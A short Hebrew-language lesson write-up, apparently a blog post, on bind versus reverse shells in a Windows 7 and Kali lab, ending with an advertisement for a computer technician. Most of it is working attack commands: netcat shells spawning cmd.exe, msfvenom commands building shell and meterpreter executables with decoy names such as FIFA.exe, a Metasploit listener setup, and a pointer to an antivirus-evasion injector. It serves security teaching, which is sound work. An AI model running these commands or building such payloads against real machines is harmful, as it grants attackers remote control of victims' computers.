Bind Shell VS Reverse Shell
בשיטת Bind משתמש א כביכול מבקש עזרה ממשתמש ב ולכן פותח עבורו אפשרות גישה לתוך המחשב שלו.
בשיטת Reverse משתמש ב פותח האזנה אצלו במחשב, ואז משתמש א מתחבר לאותה האזנה ובאותו הזמן בעצם מגיש/שולח את הגישה מהמחשב שלו למשתמש ב.
במסמך הזה משתמש א הוא כביכול ה Win7 ומשתמש ב הוא Kali.
השתמשנו בכיתה בכלי nc כדי ליצור את שתי שיטות ה Shell בין המשתמשים.
בשיטת Bind ביצענו את הפקודות הבאות:
משתמש א מריץ - nc.exe -nvlp 555 -e cmd.exe
משתמש ב מריץ - nc 192.168.1.10 555
בשיטת ה Reverse ביצענו את הפקודות הבאות:
משתמש ב מריץ - nc -nvlp 4545
משתמש א מריץ - nc 192.168.1.12 4545 -e cmd.exe
השתמשנו גם ב msfvenum כדי ליצור תוכנה זדונית קטנה שתפקידה הוא לבצע Bind וכמובן גם Reverse Shell, השתמשנו בפקודות הבאות:
כדי ליצור Bind נריץ - msfvenom -p windows/shell_bind_tcp rhost=192.168.1.7 lport=8787 -f exe -o /root/FIFA.exe
כדי ליצור Reverse נריץ - msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.11 lport=443 -f exe -o /root/Pool.exe
השתמשנו גם ב msfvenum כדי ליצור meterpreter shell, השתמשנו בפקודה הבאה:
כדי ליצור Reverse נריץ - msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=50 -f exe > reverse.exe
כדי לפתוח האזנה ב metasploit הרצנו את הפקודות הבאות:
דבר ראשון - msfconsole
דבר שני - use exploit/multi/handler
אחר כך - set payload windows/meterpreter/reverse_tcp
ואז - set lhost 192.168.1.11
כמובן גם - set lport 50
ולבסוף - run
פקודות נוספות ולינקים שהשתמשנו בהם במהלך השיעור:
א) locate nc.exe
ב) python -m SimpleHTTPServer 80
ד) xdg-open
ו) ncat
ח) המלצה שלי לנסות ולהשתמש בכלי הזה - https://tools.kali.org/maintaining-access/shellter
ליצירת קשר ושירות טכנאי מחשבים בירושלים עד הבית חייגו – 0532104457
コメント